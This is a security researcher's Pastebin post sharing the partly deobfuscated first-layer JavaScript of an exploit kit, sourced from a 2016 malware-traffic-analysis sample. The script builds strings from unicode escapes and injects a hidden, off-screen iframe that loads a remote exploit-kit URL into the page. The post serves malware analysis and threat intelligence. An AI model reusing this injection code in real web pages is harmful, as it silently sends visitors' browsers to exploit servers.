API tools faq
paste
Neonprimetime

Deofsucated 1st layer Exploit Kit Javascript from Malware Tr

Neonprimetime
Jun 3rd, 2016
216
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JavaScript 3.92 KB | None | 0 0
raw download clone embed print report
  1. Deofsucated 1st layer Exploit Kit Javascript from Malware Traffic analysis
  2. http://www.malware-traffic-analysis.net/2016/06/02/index.html
  3. original javascript posted here http://pastebin.com/KrvFUf5W
  4.  
  5. *****
  6. Below is the resulting output of the last statements in the mentioned javascript
  7.  NLxwWpg = new Function(vrDCFrjI(MTEzMzMzNTAxOQ, Mjk2MjkxMDI1MQ));
  8.  NLxwWpg();
  9. *****
  10.  
  11. function MjE4Mzk3MzYzNw() {
  12.     Sgjb6 = '\u006e' + '\u0061' + '\u0076' + '\u0069' + '\u0067' + '\u0061' + '\u0074' + '\u006f' + '\u0072';
  13.     Sgjb5 = '\u0064' + '\u006f' + '\u0063' + '\u0075' + '\u006d' + '\u0065' + '\u006e' + '\u0074';
  14.     Sgjb7 = window;
  15.     Sgjb8 = document;
  16.     Sgjb9 = Sgjb7[Sgjb5];
  17.     Sgjb = '\u0073' + '\u0072' + '\u0063';
  18.     FIMrs = '\u0069' + '\u0066' + '\u0072' + '\u0061' + '\u006d' + '\u0065';
  19.     RbGEGsI = '\u0063' + '\u0073' + '\u0073' + '\u0054' + '\u0065' + '\u0078' + '\u0074';
  20.     vBiNhRC = '\u0067' + '\u0065' + '\u0074' + '\u0045' + '\u006c' + '\u0065' + '\u006d' + '\u0065' + '\u006e' + '\u0074' + '\u0073' + '\u0042' + '\u0079' + '\u0054' + '\u0061' + '\u0067' + '\u004e' + '\u0061' + '\u006d' + '\u0065';
  21.     WvVBTR = '\u0062' + '\u006f' + '\u0064' + '\u0079';
  22.     MAx = '\u0077' + '\u0069' + '\u0064' + '\u0074' + '\u0068';
  23.     gUtk = '\u0068' + '\u0065' + '\u0069' + '\u0067' + '\u0068' + '\u0074';
  24.     BUMx = '\u0061' + '\u0070' + '\u0070' + '\u0065' + '\u006e' + '\u0064' + '\u0043' + '\u0068' + '\u0069' + '\u006c' + '\u0064';
  25.     PzmfZG = '\u0063' + '\u0072' + '\u0065' + '\u0061' + '\u0074' + '\u0065' + '\u0045' + '\u006c' + '\u0065' + '\u006d' + '\u0065' + '\u006e' + '\u0074';
  26.     Sgjb0 = '\u0073' + '\u0074' + '\u0079' + '\u006c' + '\u0065';
  27.     Sgjb1 = '\u0031' + '\u0033';
  28.     Sgjb2 = Sgjb1;
  29.     Sgjb3 = '\u0070' + '\u006f' + '\u0073' + '\u0069' + '\u0074' + '\u0069' + '\u006f' + '\u006e' + '\u003a' + '\u0061' + '\u0062' + '\u0073' + '\u006f' + '\u006c' + '\u0075' + '\u0074' + '\u0065' + '\u003b' + '\u006c' + '\u0065' + '\u0066' + '\u0074' + '\u003a' + '\u002d' + '\u0031' + '\u0036' + '\u0035' + '\u0038' + '\u0070' + '\u0078' + '\u003b' + '\u0074' + '\u006f' + '\u0070' + '\u003a' + '\u002d' + '\u0031' + '\u0036' + '\u0036' + '\u0038' + '\u0070' + '\u0078';
  30.     Sgjb4 = Sgjb9[PzmfZG](FIMrs);
  31.     Sgjb4[MAx] = Sgjb2;
  32.     Sgjb4[gUtk] = Sgjb2;
  33.     Sgjb4[Sgjb0][RbGEGsI] = Sgjb3;
  34.     Sgjb4[Sgjb] = '\u0068' + '\u0074' + '\u0074' + '\u0070' + '\u003a' + '\u002f' + '\u002f' + '\u0073' + '\u0074' + '\u0072' + '\u0061' + '\u0063' + '\u0068' + '\u0075' + '\u0062' + '\u0065' + '\u0064' + '\u0061' + '\u0062' + '\u0062' + '\u006c' + '\u0069' + '\u006e' + '\u0067' + '\u002e' + '\u0074' + '\u0068' + '\u006f' + '\u006d' + '\u0070' + '\u0073' + '\u006f' + '\u006e' + '\u0073' + '\u002d' + '\u006f' + '\u006e' + '\u006c' + '\u0069' + '\u006e' + '\u0065' + '\u002e' + '\u0063' + '\u006f' + '\u002e' + '\u0075' + '\u006b' + '\u002f' + '\u0059' + '\u0078' + '\u0075' + '\u005a' + '\u0059' + '\u0052' + '\u002f' + '\u0072' + '\u0054' + '\u006b' + '\u004e' + '\u006e' + '\u004c' + '\u0055' + '\u002f' + '\u0066' + '\u004f' + '\u0068' + '\u0058' + '\u0058' + '\u006a' + '\u0070' + '\u0065' + '\u0059' + '\u002f' + '\u0030' + '\u0030' + '\u0037' + '\u0035' + '\u0037' + '\u002f' + '\u0073' + '\u0064' + '\u006d' + '\u006d' + '\u0054' + '\u0071' + '\u0062' + '\u0077' + '\u0064' + '\u0078' + '\u002d' + '\u0030' + '\u0039' + '\u0032' + '\u0036' + '\u0032' + '\u0030' + '\u002d' + '\u007a' + '\u006b' + '\u0062' + '\u0067' + '\u0072' + '\u0077' + '\u0068' + '\u0069' + '\u002e' + '\u006a' + '\u0070' + '\u0067';
  35.     Sgjb9[vBiNhRC](WvVBTR)[0][BUMx + ''](Sgjb4)
  36. }
  37.  
  38. function ldNRgDCf() {
  39.     var FIMrs0 = setTimeout;
  40.     var FIMrs1 = document.body;
  41.     return (!FIMrs1 ? FIMrs0(ldNRgDCf, 10) : MjE4Mzk3MzYzNw());
  42. }
  43. ldNRgDCf();
  44.  
  45.  
  46.  
  47. *******
  48. *******
  49. *******
  50. More FROM @neonprimetime security
  51.  
  52. http://pastebin.com/u/Neonprimetime
  53. https://www.virustotal.com/en/USER/neonprimetime/
  54. https://twitter.com/neonprimetime
  55. https://www.reddit.com/USER/neonprimetime
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!